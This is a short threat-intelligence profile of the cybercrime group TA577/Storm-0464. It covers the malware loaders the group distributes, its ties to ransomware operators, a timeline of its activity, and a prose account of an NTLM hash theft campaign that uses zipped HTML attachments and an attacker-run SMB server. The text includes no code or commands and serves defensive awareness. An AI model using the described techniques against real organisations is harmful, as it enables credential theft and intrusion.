TA577(Proofpoint)/Storm-0464(Microsoft) is a prominent cybercrime(affiliate) threat actor.
Role In RaaS economy: Initial access provider
Targets: Americas and Europe
Loader’s Used for initial access:
- Qakbot: One of the primary payloads used by the group. It’s used to deploy ransomware.
- SquirrelWaffle Loader: Another payload distributed by the group, which is also used by attackers to deploy ransomware.
- Pikabot: In February 2023, they started distributing Pikabot.
- DarkGate: After takedown of Qakbot ,in September 2023, they started using DarkGate in their initial access campaigns.
- IcedID: Along with DarkGate, they also started using IcedID in their initial access campaigns in September 2023.
- Additionally, group has deployed payloads like SystemBC, SmokeLoader, Ursnif, and Cobalt Strike.
Ransomware Deployment/Infections by the group
- Storm-0506 that deploys Blackbasta, previously storm-0506 used to deploy conti.
- Sodinokibi
Recent Activity
- In February 2023, group started distributing Pikabot.
- In September 2023, they began leveraging DarkGate and IcedID in their initial access campaigns.
- On January 25, 2024, they started distributing a new version of Qakbot through a phishing email campaign.
- On September 28, 2023, they shifted to distributing DarkGate malware after takedown of Qakbot’s infrastructure.
- In 2020, they leveraged Qakbot infections leading to ransomware deployment by various groups.
Latest activity
Attack Chain and Objective as observed in recent activity by Proofpoint:
- Proofpoint identified TA577 using a new attack chain to achieve an uncommonly observed objective: stealing NT LAN Manager (NTLM) authentication information.
- This activity allows the threat actor to gather sensitive information and potentially enable follow-on attacks.
- At least two campaigns leveraging this technique were observed, targeting hundreds of organizations globally.
- The attack involved sending messages as replies to previous emails (known as thread hijacking) and containing zipped HTML attachments.
- When recipients opened these attachments, they triggered a system connection attempt to an external Server Message Block (SMB) server owned by the threat actor.
- The goal was to capture NTLMv2 Challenge/Response pairs from the SMB server to steal NTLM hashes.
- These stolen hashes could be exploited for password cracking or used in “Pass-The-Hash” attacks within the targeted organization.
- The use of open-source toolkit Impacket on the SMB server was identified, indicating the threat actor’s intentions.
- Disabling guest access to SMB does not mitigate the attack, as the file must authenticate to the external SMB server to determine if it should use guest access.